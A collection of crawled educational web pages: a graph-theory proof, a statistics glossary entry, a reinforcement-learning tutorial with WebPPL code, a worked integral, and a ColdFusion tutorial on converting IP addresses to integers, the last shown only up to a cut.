{"ft_lang_label":"__label__zh","ft_lang_prob":0.5574649,"math_prob":0.61331683,"size":2128,"snap":"2020-10-2020-16","text_gpt3_token_len":1256,"char_repetition_ratio":0.18879473,"word_repetition_ratio":0.4785276,"special_character_ratio":0.24906015,"punctuation_ratio":0.2875318,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95800793,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-26T16:28:10Z\",\"WARC-Record-ID\":\"<urn:uuid:3128cece-7b3f-42f9-9377-6aa0ec86af10>\",\"Content-Length\":\"56191\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a170552f-4a48-46e3-bb03-9275d973bf93>\",\"WARC-Concurrent-To\":\"<urn:uuid:bb46331e-dd36-4ee3-bec0-9c0f88ce799b>\",\"WARC-IP-Address\":\"54.168.55.14\",\"WARC-Target-URI\":\"https://ithelp.ithome.com.tw/articles/10229795?sc=rss.qu\",\"WARC-Payload-Digest\":\"sha1:HC5MGE346CTDVSTN75WGV5H6MXIANHQS\",\"WARC-Block-Digest\":\"sha1:G33DEI4RRUMZKUGFCUGLJCKSTAI56ND3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875146414.42_warc_CC-MAIN-20200226150200-20200226180200-00396.warc.gz\"}"}
https://proofwiki.org/wiki/Isomorphism_Classes_for_Order_4_Size_3_Simple_Graphs
[ "# Isomorphism Classes for Order 4 Size 3 Simple Graphs\n\n## Theorem\n\nThere are $3$ equivalence classes for simple graphs of order $4$ and size $3$ under isomorphism:", null, "## Proof\n\nThe fact that the $3$ graphs given are not isomorphic follows from Vertex Condition for Isomorphic Graphs.\n\nThe vertices have degrees as follows:\n\nGraph $1$: $2, 2, 1, 1$\nGraph $2$: $3, 1, 1, 1$\nGraph $3$: $2, 2, 2, 0$\n\nThe fact that there are no more isomorphism classes of such graphs can be proved constructively.\n\nLet the $4$ vertices be named $A, B, C$ and $D$.\n\nLemma: There must be intersections among the edges.\n\nProof: If there were no intersection at all, it requires at least $3 \\times 2 = 6$ vertices.\n\nWithout loss of generality, let $2$ of the edges be $AB$ and $AC$.\n\nTo place the last edge, there are $\\dbinom 4 2 = 6$ potential choices:\n\n$AB$: this makes the graph not simple\n$AC$: this makes the graph not simple\n$AD$: this is isomorphic to graph $2$\n$BC$: this is isomorphic to graph $3$\n$BD$: this is isomorphic to graph $1$\n$CD$: this is isomorphic to graph $1$.\n\nHence, by Proof by Cases, these $3$ are the only isomorphism classes.\n\n$\\blacksquare$" ]
[ null, "https://proofwiki.org/w/images/thumb/2/2d/Isomorphism-Classes-Order4-Size3-Simple.png/400px-Isomorphism-Classes-Order4-Size3-Simple.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8793899,"math_prob":0.9999244,"size":1916,"snap":"2023-14-2023-23","text_gpt3_token_len":537,"char_repetition_ratio":0.13023013,"word_repetition_ratio":0.1661721,"special_character_ratio":0.28757828,"punctuation_ratio":0.16243654,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999989,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-20T16:32:57Z\",\"WARC-Record-ID\":\"<urn:uuid:d25399c0-3de7-4c91-8453-f06410aee914>\",\"Content-Length\":\"41855\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c9956d10-6cd2-4442-9e71-2e0db7cf36ff>\",\"WARC-Concurrent-To\":\"<urn:uuid:186d811d-7055-4735-ad3b-7c0335108278>\",\"WARC-IP-Address\":\"172.67.198.93\",\"WARC-Target-URI\":\"https://proofwiki.org/wiki/Isomorphism_Classes_for_Order_4_Size_3_Simple_Graphs\",\"WARC-Payload-Digest\":\"sha1:ERK53T6ZHS6YWDQFNFK5GUCJ5Z2QMDBI\",\"WARC-Block-Digest\":\"sha1:JK6ACT4I56D2BA6DA37FRS3QC5TLAHHW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296943484.34_warc_CC-MAIN-20230320144934-20230320174934-00444.warc.gz\"}"}
https://www.statisticshowto.com/absolute-standard-deviation/
[ "# Absolute Standard Deviation: What is it?\n\n## What is Absolute Standard Deviation?", null, "There isn’t a clear definition for the term “absolute standard deviation.” You might sometimes see in a text book, lab notes, lecture notes, or some other in-class materials; the author is usually referring the “traditional” standard deviation. However, it might also refer to error propagation, relative standard deviation, or the absolute deviation.\n\nRead your text or notes and try to figure out which of these the author is talking about. If it’s in lab notes, lecture notes, or some other in-class materials, then ask your instructor to clarify the term.\n\n## Brief Definitions\n\nThese brief definitions might make it clear which term your book/paper is actually talking about. Click on the italicized link at the end of each definition for more information about the term, and how to calculate each term.\n\n• Standard deviation: Standard deviation is a measure of how much your data is spread out. The formula to calculate it by hand is cumbersome, but possible if you follow the directions step-by-step. See: How to calculate the standard deviation.\n• Error propagation: Error propagation (sometimes called propagation of uncertainty) happens when you use uncertain measurements to calculate something else. For example, you might use length to find area. “Propagation” is when these errors grow much more quickly than the sum of the individual errors. Several formulas exist to take calculate these errors. See: Formulas for Error Propagation (Propagation of Uncertainty).\n• Relative standard deviation: The RSD is a special form of the standard deviation. It tells you whether the “regular” std dev is a small or large quantity when compared to the mean for the data set. It’s reported as a positive percentage. See: What is the relative standard deviation?\n• Absolute deviation: the distance between each value in the data set and that data set’s mean or median. See: Average Deviation (Average Absolute Deviation)\n\n## References\n\nGonick, L. (1993). The Cartoon Guide to Statistics. HarperPerennial.\nKotz, S.; et al., eds. (2006), Encyclopedia of Statistical Sciences, Wiley.\nEveritt, B. S.; Skrondal, A. (2010), The Cambridge Dictionary of Statistics, Cambridge University Press.\n\nCITE THIS AS:\nStephanie Glen. \"Absolute Standard Deviation: What is it?\" From StatisticsHowTo.com: Elementary Statistics for the rest of us! https://www.statisticshowto.com/absolute-standard-deviation/" ]
[ null, "https://www.statisticshowto.com/wp-content/uploads/2014/12/what-is-a-variable.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86677206,"math_prob":0.7130387,"size":2212,"snap":"2023-40-2023-50","text_gpt3_token_len":456,"char_repetition_ratio":0.14175725,"word_repetition_ratio":0.023391813,"special_character_ratio":0.2056962,"punctuation_ratio":0.15625,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9862305,"pos_list":[0,1,2],"im_url_duplicate_count":[null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-21T15:46:40Z\",\"WARC-Record-ID\":\"<urn:uuid:396a3131-f03f-48b8-9b1f-4a9e0537cccb>\",\"Content-Length\":\"96646\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ede66b1f-09ae-45fe-b1e6-9bd739522f48>\",\"WARC-Concurrent-To\":\"<urn:uuid:24644aec-a6b2-4863-96f4-894114cf8514>\",\"WARC-IP-Address\":\"172.66.40.136\",\"WARC-Target-URI\":\"https://www.statisticshowto.com/absolute-standard-deviation/\",\"WARC-Payload-Digest\":\"sha1:VO7US4N72XZM4POJUY2UTCRWRDBRPPUN\",\"WARC-Block-Digest\":\"sha1:4NWBHJPBFRQ3S4XNU4L3ZHZHJFGKV5ZI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506028.36_warc_CC-MAIN-20230921141907-20230921171907-00143.warc.gz\"}"}
https://agentmodels.org/chapters/3d-reinforcement-learning.html
[ "# Reinforcement Learning to Learn MDPs\n\n## Introduction\n\nPrevious chapters assumed that the agent already knew the structure of the environment. In MDPs, the agent knows everything about the environment and just needs to compute a good plan. In POMDPs, the agent is ignorant of some hidden state but knows how the environment works given this hidden state. Reinforcement Learning (RL) methods apply when the agent doesn’t know the structure of the environment. For example, suppose the agent faces an unknown MDP. Provided the agent observes the reward/utility of states, RL methods will eventually converge on the optimal policy for the MDP. That is, RL eventually learns the same policy that an agent with full knowledge of the MDP would compute.\n\nRL has been one of the key tools behind recent major breakthroughs in AI, such as defeating humans at Go refp:silver2016mastering and learning to play videogames from only pixel input refp:mnih2015human. This chapter applies RL to learning discrete MDPs. It’s possible to generalize RL techniques to continuous state and action spaces and also to learning POMDPs refp:jaderberg2016reinforcement but that’s beyond the scope of this tutorial.\n\n## Reinforcement Learning for Bandits\n\nThe previous chapter introduced the Multi-Arm Bandit problem. We computed the Bayesian optimal solution to Bandit problems by treating them as POMDPs. Here we apply Reinforcement Learning to Bandits. RL agents won’t perform optimally but they often rapidly converge to the best arm and RL techniques are highly scalable and simple to implement. (In Bandits the agent already knows the structure of the MDP. So Bandits does not showcase the ability of RL to learn a good policy in a complex unknown MDP. We discuss more general RL techniques below).\n\nOutside of this chapter, we use term “utility” (e.g. in the definition of an MDP) rather than “reward”. This chapter follows the convention in Reinforcement Learning of using “reward”.\n\n### Softmax Greedy Agent\n\nThis section introduces an RL agent specialized to Bandit: a “greedy” agent with softmax action noise. The Softmax Greedy agent updates beliefs about the hidden state (the expected rewards for the arms) using Bayesian updates. Yet instead of making sequential plans that balance exploration (e.g. making informative observations) with exploitation (gaining high reward), the Greedy agent takes the action with highest immediate expected return1 (up to softmax noise).\n\nWe measure the agent’s performance on Bernoulli-distributed Bandits by computing the cumulative regret over time. The regret for an action is the difference in expected returns between the action and the objective best action2. In the codebox below, the arms have parameter values (“coin-weights”) of $[0.5,0.6]$ and there are 500 Bandit trials.\n\n///fold:\nvar cumsum = function (xs) {\nvar acf = function (n, acc) { return acc.concat( (acc.length > 0 ? acc[acc.length-1] : 0) + n); }\nreturn reduce(acf, [], xs.reverse());\n}\n\n///\n\n// Define Bandit problem\n\n// Pull arm0 or arm1\nvar actions = [0, 1];\n\n// Given a state (a coin-weight p for each arm), sample reward\nvar observeStateAction = function(state, action){\nvar armToCoinWeight = state;\nreturn sample(Bernoulli({p : armToCoinWeight[action]}))\n};\n\n// Greedy agent for Bandits\nvar makeGreedyBanditAgent = function(params) {\nvar priorBelief = params.priorBelief;\n\n// Update belief about coin-weights from observed reward\nvar updateBelief = function(belief, observation, action){\nreturn Infer({ model() {\nvar armToCoinWeight = sample(belief);\ncondition( observation === observeStateAction(armToCoinWeight, action))\nreturn armToCoinWeight;\n}});\n};\n\n// Evaluate arms by expected coin-weight\nvar expectedReward = function(belief, action){\nreturn expectation(Infer( { model() {\nvar armToCoinWeight = sample(belief);\nreturn armToCoinWeight[action];\n}}))\n}\n\n// Choose by softmax over expected reward\nvar act = dp.cache(\nfunction(belief) {\nreturn Infer({ model() {\nvar action = uniformDraw(actions);\nfactor(params.alpha * expectedReward(belief, action))\nreturn action;\n}});\n});\n\nreturn { params, act, updateBelief };\n};\n\n// Run Bandit problem\nvar simulate = function(armToCoinWeight, totalTime, agent) {\nvar act = agent.act;\nvar updateBelief = agent.updateBelief;\nvar priorBelief = agent.params.priorBelief;\n\nvar sampleSequence = function(timeLeft, priorBelief, action) {\nvar observation = (action !== 'noAction') &&\nobserveStateAction(armToCoinWeight, action);\nvar belief = ((action === 'noAction') ? priorBelief :\nupdateBelief(priorBelief, observation, action));\nvar action = sample(act(belief));\n\nreturn (timeLeft === 0) ? [action] :\n[action].concat(sampleSequence(timeLeft-1, belief, action));\n};\nreturn sampleSequence(totalTime, priorBelief, 'noAction');\n};\n\n// Agent params\nvar alpha = 30\nvar priorBelief = Infer({ model () {\nvar p0 = uniformDraw([.1, .3, .5, .6, .7, .9]);\nvar p1 = uniformDraw([.1, .3, .5, .6, .7, .9]);\nreturn { 0:p0, 1:p1};\n} });\n\n// Bandit params\nvar numberTrials = 500;\nvar armToCoinWeight = { 0: 0.5, 1: 0.6 };\n\nvar agent = makeGreedyBanditAgent({alpha, priorBelief});\nvar trajectory = simulate(armToCoinWeight, numberTrials, agent);\n\n// Compare to random agent\nvar randomTrajectory = repeat(\nnumberTrials,\nfunction(){return uniformDraw([0,1]);}\n);\n\n// Compute agent performance\nvar regret = function(arm) {\nvar bestCoinWeight = _.max(_.values(armToCoinWeight))\nreturn bestCoinWeight - armToCoinWeight[arm];\n};\n\nvar trialToRegret = map(regret,trajectory);\nvar trialToRegretRandom = map(regret, randomTrajectory)\nvar ys = cumsum( trialToRegret)\n\nprint('Number of trials: ' + numberTrials);\nprint('Total regret: [GreedyAgent, RandomAgent] ' +\nsum(trialToRegret) + ' ' + sum(trialToRegretRandom))\nprint('Arms pulled: ' + trajectory);\n\nviz.line(_.range(ys.length), ys, {xLabel:'Time', yLabel:'Cumulative regret'});\n\n\nHow well does the Greedy agent do? It does best when the difference between arms is large but does well even when the arms are close. Greedy agents perform well empirically on a wide range of Bandit problems refp:kuleshov2014algorithms and if their noise decays over time they can achieve asymptotic optimality. In contrast to the optimal POMDP agent from the previous chapter, the Greedy Agent scales well in both number of arms and trials.\n\nExercises:\n\n1. Modify the code above so that it’s easy to repeatedly run the same agent on the same Bandit problem. Compute the mean and standard deviation of the agent’s total regret averaged over 20 episodes on the Bandit problem above. Use WebPPL’s library functions.\n2. Set the softmax noise to be low. How well does the Greedy Softmax agent do? Explain why. Keeping the noise low, modify the agent’s priors to be overly “optimistic” about the expected reward of each arm (without changing the support of the prior distribution). How does this optimism change the agent’s performance? Explain why. (An optimistic prior assigns a high expected reward to each arm. This idea is known as “optimism in the face of uncertainty” in the RL literature.)\n3. Modify the agent so that the softmax noise is low and the agent has a “bad” prior (i.e. one that assigns a low probability to the truth) that is not optimistic. Will the agent always learn the optimal policy (eventually?) If so, after how many trials is the agent very likely to have learned the optimal policy? (Try to answer this question without doing experiments that take a long time to run.)\n\n### Posterior Sampling\n\nPosterior sampling (or “Thompson sampling”) is the basis for another algorithm for Bandits. This algorithm generalizes to arbitrary discrete MDPs, as we show below. The Posterior-sampling agent updates beliefs using standard Bayesian updates. Before choosing an arm, it draws a sample from its posterior on the arm parameters and then chooses greedily given the sample. In Bandits, this is similar to Softmax Greedy but without the softmax parameter $\\alpha$.\n\nExercise: Implement Posterior Sampling for Bandits by modifying the code above. (You only need to modify the act function.) Compare the performance of Posterior Sampling to Softmax Greedy (using the value for $\\alpha$ in the codebox above). You should vary the armToCoinWeight parameter and the number of arms. Evaluate each agent by computing the mean and standard deviation of rewards averaged over many trials. Which agent is better overall and why?\n\n## RL algorithms for MDPs\n\nThe RL algorithms above are specialized to Bandits and so they aren’t able to learn an arbitrary MDP. We now consider algorithms that can learn any discrete MDP. There are two kinds of RL algorithm:\n\n1. Model-based algorithms learn an explicit representation of the MDP’s transition and reward functions. These representations are used to compute a good policy.\n\n2. Model-free algorithms do not explicitly represent or learn the transition and reward functions. Instead they explicitly represent either a value function (i.e. an estimate of the $Q^*$-function) or a policy.\n\nThe best known RL algorithm is Q-learning, which works both for discrete MDPs and for MDPs with high-dimensional state spaces (where “function approximation” is required). Q-learning is a model-free algorithm that directly learns the expected utility/reward of each action under the optimal policy. We leave as an exercise the implementation of Q-learning in WebPPL. Due to the functional purity of WebPPL, a Bayesian version of Q-learning is more natural and in the spirit of this tutorial. See, for example “Bayesian Q-learning” refp:dearden1998bayesian and this review of Bayesian model-free approaches refp:ghavamzadeh2015bayesian.\n\n### Posterior Sampling Reinforcement Learning (PSRL)\n\nPosterior Sampling Reinforcemet Learning (PSRL) is a model-based algorithm that generalizes posterior-sampling for Bandits to discrete, finite-horizon MDPs refp:osband2016posterior. The agent is initialized with a Bayesian prior distribution on the reward function $R$ and transition function $T$. At each episode the agent proceeds as follows:\n\n1. Sample $R$ and $T$ (a “model”) from the distribution. Compute the optimal policy for this model and follow it until the episode ends.\n2. Update the distribution on $R$ and $T$ on observations from the episode.\n\nHow does this agent efficiently balances exploration and exploitation to rapidly learn the structure of an MDP? If the agent’s posterior is already concentrated on a single model, the agent will mainly “exploit”. If the agent is uncertain over models, then it will sample various different models in turn. For each model, the agent will visit states with high reward on that model and so this leads to exploration. If the states turn out not to have high reward, the agent learns this and updates their beliefs away from the model (and will rarely visit the states again).\n\nThe PSRL agent is simple to implement in our framework. The Bayesian belief-updating re-uses code from the POMDP agent: $R$ and $T$ are treated as latent state and are observed every state transition. Computing the optimal policy for a sampled $R$ and $T$ is equivalent to planning in an MDP and we can re-use our MDP agent code.\n\nWe run the PSRL agent on Gridworld. The agent knows $T$ but does not know $R$. Reward is known to be zero everywhere but a single cell of the grid. The actual MDP is shown in Figure 1, where the time-horizon is 8 steps. The true reward function is specified by the variable trueLatentReward (where the order of the rows is the inverse of the displayed grid). The displays shows the agent’s trajectory on each episode (where the number of episodes is set to 10).", null, "Figure 1: True latent reward for Gridworld below. Agent receives reward 1 in the cell marked “G” and zero elsewhere.\n\n///fold:\n\n// Construct Gridworld (transitions but not rewards)\nvar ___ = ' ';\n\nvar grid = [\n[ ___, ___, '#', ___],\n[ ___, ___, ___, ___],\n[ '#', ___, '#', '#'],\n[ ___, ___, ___, ___]\n];\n\nvar pomdp = makeGridWorldPOMDP({\ngrid,\nstart: [0, 0],\ntotalTime: 8,\ntransitionNoiseProbability: .1\n});\n\nvar transition = pomdp.transition\n\nvar actions = ['l', 'r', 'u', 'd'];\n\nvar utility = function(state, action) {\nvar loc = state.manifestState.loc;\nvar r = state.latentState.rewardGrid[loc][loc];\n\nreturn r;\n};\n\n// Helper function to generate agent prior\nvar getOneHotVector = function(n, i) {\nif (n==0) {\nreturn [];\n} else {\nvar e = 1*(i==0);\nreturn [e].concat(getOneHotVector(n-1, i-1));\n}\n};\n///\n\nvar observeState = function(state) {\nreturn utility(state);\n};\n\nvar makePSRLAgent = function(params, pomdp) {\nvar utility = params.utility;\n\n// belief updating: identical to POMDP agent from Chapter 3c\nvar updateBelief = function(belief, observation, action){\nreturn Infer({ model() {\nvar state = sample(belief);\nvar predictedNextState = transition(state, action);\nvar predictedObservation = observeState(predictedNextState);\ncondition(_.isEqual(predictedObservation, observation));\nreturn predictedNextState;\n}});\n};\n\n// this is the MDP agent from Chapter 3a\nvar act = dp.cache(\nfunction(state) {\nreturn Infer({ model() {\nvar action = uniformDraw(actions);\nvar eu = expectedUtility(state, action);\nfactor(1000 * eu);\nreturn action;\n}});\n});\n\nvar expectedUtility = dp.cache(\nfunction(state, action) {\nreturn expectation(\nInfer({ model() {\nvar u = utility(state, action);\nif (state.manifestState.terminateAfterAction) {\nreturn u;\n} else {\nvar nextState = transition(state, action);\nvar nextAction = sample(act(nextState));\nreturn u + expectedUtility(nextState, nextAction);\n}\n}}));\n});\n\nreturn { params, act, expectedUtility, updateBelief };\n};\n\nvar simulatePSRL = function(startState, agent, numEpisodes) {\nvar act = agent.act;\nvar updateBelief = agent.updateBelief;\nvar priorBelief = agent.params.priorBelief;\n\nvar runSampledModelAndUpdate = function(state, priorBelief, numEpisodesLeft) {\nvar sampledState = sample(priorBelief);\nvar trajectory = simulateEpisode(state, sampledState, priorBelief, 'noAction');\nvar newBelief = trajectory[trajectory.length-1];\nvar newBelief2 = Infer({ model() {\nreturn extend(state, {latentState : sample(newBelief).latentState });\n}});\nvar output = [trajectory];\n\nif (numEpisodesLeft <= 1){\nreturn output;\n} else {\nreturn output.concat(runSampledModelAndUpdate(state, newBelief2,\nnumEpisodesLeft-1));\n}\n};\n\nvar simulateEpisode = function(state, sampledState, priorBelief, action) {\nvar observation = observeState(state);\nvar belief = ((action === 'noAction') ? priorBelief :\nupdateBelief(priorBelief, observation, action));\n\nvar believedState = extend(state, { latentState : sampledState.latentState });\nvar action = sample(act(believedState));\nvar output = [[state, action, belief]];\n\nif (state.manifestState.terminateAfterAction){\nreturn output;\n} else {\nvar nextState = transition(state, action);\nreturn output.concat(simulateEpisode(nextState, sampledState, belief, action));\n}\n};\nreturn runSampledModelAndUpdate(startState, priorBelief, numEpisodes);\n};\n\n// Construct agent's prior. The latent state is just the reward function.\n// The \"manifest\" state is the agent's own location.\n\n// Combine manifest (fully observed) state with prior on latent state\nvar getPriorBelief = function(startManifestState, latentStateSampler){\nreturn Infer({ model() {\nreturn {\nmanifestState: startManifestState,\nlatentState: latentStateSampler()};\n}});\n};\n\n// True reward function\nvar trueLatentReward = {\nrewardGrid : [\n[ 0, 0, 0, 0],\n[ 0, 0, 0, 0],\n[ 0, 0, 0, 0],\n[ 0, 0, 0, 1]\n]\n};\n\n// True start state\nvar startState = {\nmanifestState: {\nloc: [0, 0],\nterminateAfterAction: false,\ntimeLeft: 8\n},\nlatentState: trueLatentReward\n};\n\n// Agent prior on reward functions (*getOneHotVector* defined above fold)\nvar latentStateSampler = function() {\nvar flat = getOneHotVector(16, randomInteger(16));\nreturn {\nrewardGrid : [\nflat.slice(0,4),\nflat.slice(4,8),\nflat.slice(8,12),\nflat.slice(12,16) ]\n};\n}\n\nvar priorBelief = getPriorBelief(startState.manifestState, latentStateSampler);\n\n// Build agent (using *pomdp* object defined above fold)\nvar agent = makePSRLAgent({ utility, priorBelief, alpha: 100 }, pomdp);\n\nvar numEpisodes = 10\nvar trajectories = simulatePSRL(startState, agent, numEpisodes);\n\nvar concatAll = function(list) {\nvar inner = function (work, i) {\nif (i < list.length-1) {\nreturn inner(work.concat(list[i]), i+1)\n} else {\nreturn work;\n}\n}\nreturn inner([], 0);\n}\n\nvar badState = [[ { manifestState : { loc : \"break\" } } ]];\n\nvar trajectories = map(function(t) { return t.concat(badState);}, trajectories);\nviz.gridworld(pomdp, {trajectory : concatAll(trajectories)});\n\n\n### Footnotes\n\n1. The standard Epsilon/Softmax Greedy agent from the Bandit literature maintains point estimates for the expected rewards of the arms. In WebPPL it’s natural to use distributions instead. In a later chapter, we will implement a more general Greedy/Myopic agent by extending the POMDP agent.\n\n2. The “regret” is a standard Frequentist metric for performance. Bayesian metrics, which take into account the agent’s priors, are beyond the scope of this chapter." ]
[ null, "https://agentmodels.org/assets/img/3d-gridworld.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7415991,"math_prob":0.97645617,"size":16796,"snap":"2021-21-2021-25","text_gpt3_token_len":4026,"char_repetition_ratio":0.15418056,"word_repetition_ratio":0.046368487,"special_character_ratio":0.24148607,"punctuation_ratio":0.17766324,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98178715,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-05-15T14:11:43Z\",\"WARC-Record-ID\":\"<urn:uuid:f95f421d-e282-445e-bd5b-fd8516f10a82>\",\"Content-Length\":\"23490\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:162aa548-076b-4f09-8929-07322e091d73>\",\"WARC-Concurrent-To\":\"<urn:uuid:ee2a981f-0a01-4050-bf9e-977892fe56f1>\",\"WARC-IP-Address\":\"104.21.48.117\",\"WARC-Target-URI\":\"https://agentmodels.org/chapters/3d-reinforcement-learning.html\",\"WARC-Payload-Digest\":\"sha1:A7J66HNQGDPQCNCJF654TXBYFUS5B6HM\",\"WARC-Block-Digest\":\"sha1:FRC4CY2OVN6RFQPLGGCTMN25HLFGZXV2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-21/CC-MAIN-2021-21_segments_1620243991370.50_warc_CC-MAIN-20210515131024-20210515161024-00594.warc.gz\"}"}
https://socratic.org/questions/int-0-1-1-x-2-1
[ "# int_0^1 1/(x^2+1) = ?\n\nDec 14, 2017\n\n$\\frac{\\pi}{4}$\n\n#### Explanation:\n\nFirst thing to sonsider is:\n\n$\\int \\frac{1}{{x}^{2} + 1} \\mathrm{dx}$\n\nMake a substitution:\n\n$x = \\tan \\theta$\n\n$\\implies \\mathrm{dx} = {\\sec}^{2} \\theta$ $d \\theta$\n\n$\\implies \\int \\frac{1}{{\\tan}^{2} \\theta + 1} {\\sec}^{2}$$d \\theta$\n\nWe must use the identity:\n\n$1 + {\\tan}^{2} x = {\\sec}^{2} x$\n\n$\\implies \\int {\\sec}^{2} \\frac{\\theta}{{\\sec}^{2} \\theta} d \\theta$\n\n$\\implies \\int d \\theta$\n\n$\\implies \\theta + c$\n\nUse: ${\\tan}^{- 1} x = \\theta$\n\n$= {\\tan}^{- 1} x + c$\n\nNow considering limits from $0$ to $1$\n\n$\\implies {\\tan}^{- 1} \\left(1\\right) - {\\tan}^{- 1} \\left(0\\right)$\n\n$\\implies \\frac{\\pi}{4} - 0$\n\n$\\implies \\frac{\\pi}{4}$\n\nDec 14, 2017\n\n$\\frac{\\pi}{4}$\n\n#### Explanation:\n\n${\\int}_{0}^{1} \\frac{1}{{x}^{2} + 1} \\mathrm{dx}$\n\nwe do this by substitution\n\n$x = \\tan u$\n\n$\\implies \\mathrm{dx} = {\\sec}^{2} u \\mathrm{du}$\n\nchange of limits\n\n$x = 0 \\implies u = {\\tan}^{- 1} 0 = 0$\n\n$x = 1 \\implies u = {\\tan}^{- 1} 1 = \\frac{\\pi}{4}$\n\nthe integral becomes\n\n${\\int}_{0}^{\\frac{\\pi}{4}} \\frac{1}{\\cancel{{\\tan}^{2} u + 1}} \\times \\cancel{{\\sec}^{2} u} \\mathrm{du}$\n\n$= {\\int}_{0}^{\\frac{\\pi}{4}} \\mathrm{du} = {\\left[u\\right]}_{0}^{\\frac{\\pi}{4}}$\n\n$= \\frac{\\pi}{4} = 0 = \\frac{\\pi}{4}$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5456011,"math_prob":1.00001,"size":387,"snap":"2021-43-2021-49","text_gpt3_token_len":104,"char_repetition_ratio":0.09921671,"word_repetition_ratio":0.0,"special_character_ratio":0.26873386,"punctuation_ratio":0.12162162,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000092,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-28T03:05:42Z\",\"WARC-Record-ID\":\"<urn:uuid:27db0ef0-d8b6-461b-a36e-52f30c012a45>\",\"Content-Length\":\"34422\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9c36ba0c-0cf7-4204-ba32-3f322a0a8fc7>\",\"WARC-Concurrent-To\":\"<urn:uuid:6af974c3-6c84-40cd-a906-20727672c865>\",\"WARC-IP-Address\":\"216.239.34.21\",\"WARC-Target-URI\":\"https://socratic.org/questions/int-0-1-1-x-2-1\",\"WARC-Payload-Digest\":\"sha1:HIKBWCVT5DE3FWKKKF2SV4NM5QVYYAIS\",\"WARC-Block-Digest\":\"sha1:NROM3XLGGLQNJTUULDBZ5P6CDFNZEMN3\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323588246.79_warc_CC-MAIN-20211028003812-20211028033812-00667.warc.gz\"}"}
https://www.bennadel.com/blog/1830-converting-ip-addresses-to-and-from-integer-values-with-coldfusion.htm
[ "On User Experience (UX) Design, JavaScript, ColdFusion, Node.js, Life, and Love.\n\n# Converting IP Addresses To And From Integer Values With ColdFusion\n\nTags: ColdFusion\n\nI've been playing with my bits a lot lately, parsing RGB colors and embedding secret messages inside image data; but, bit manipulation is still something that feels somewhat awkward to me. I guess I live in a base10 (decimal) world and it's hard for me to think in terms of base2 (binary). As such, when a conversation about IP-to-Integer conversion popped up on my InputBaseN() / FormatBaseN() post, I figured it would be a great opportunity for me to strengthen my bit-manipulation skills. I know converting an IP address to an integer (and back) is something that's been done a million times over; but for me, personally, it's new and ripe for practice.\n\nIn an IP to Integer conversion, we want to take an IP address string value, such as \"70.112.108.147\", and convert it into an integer value, such as 1181772947. Typically, this is done for storage and comparison purposes - I'm told it's both easier and faster to store and compare two integer values than it is two string values. Database philosophy aside, though, this value conversion is done in a bit-wise manner.\n\nBefore we get into the code, let's think about what needs to be done. Each part (octet) of an IP address consists of a single number whose value ranges between 0-255. Furthermore, each decimal number (in general) can be represented in binary as a string of bits. When we combine the individual parts of an IP address, we have to form a single integer value; but, we have to do this in such a way that none of the underlying bits overlap.", null, "As you can see, our final integer value is not much more than a glorified bit-mask in which each \"flag\" is represented, not by a single bit, but rather by 8 bits. To make sure that the \"flags\" (IP octet values) remain intact during the conversion, we have to shift them over by multiples of 8 as we add them together.\n\nNow that we see what we're trying to do, let's take a look at the ColdFusion code. In this first demo, we're going to convert an IP address into an integer:\n\n``````<!--- Set the IP address. --->\n\n<!--- Break the IP address into numeric units. --->\n<cfset ipParts = listToArray( ipAddress, \".\" ) />\n\n<!--- Create a running total for our numeric IP equivalent. --->\n<cfset ipNumber = 0 />\n\n<!---\nLoop over the parts of the array. For each part, we are going\nto let the 8 bits be continually shifted over to add exclusive\nbits to the running total.\n--->\n<cfloop\nindex=\"offset\"\nfrom=\"1\"\nto=\"#arrayLen( ipParts )#\"\nstep=\"1\">\n\n<!---\nSince each IP unit is a max of 255, we need to shift it\nover (bit-wise) for multiples of 8.\n--->\n<cfset ipNumber += bitSHLN(\nipParts[ offset ],\n((arrayLen( ipParts ) - offset) * 8)\n) />\n\n</cfloop>\n\n<!--- Output the resultant IP number equivalent. --->\nIP Number: #ipNumber#\n``````\n\nAs you can see, we have a running total to which we are adding each IP octet value. As we add the octet value, however, we are using ColdFusion's bitSHLN() method to perform a left-shift of the bits as explained in the diagram above. When we run the above code, we get the following output:\n\nIP Number: 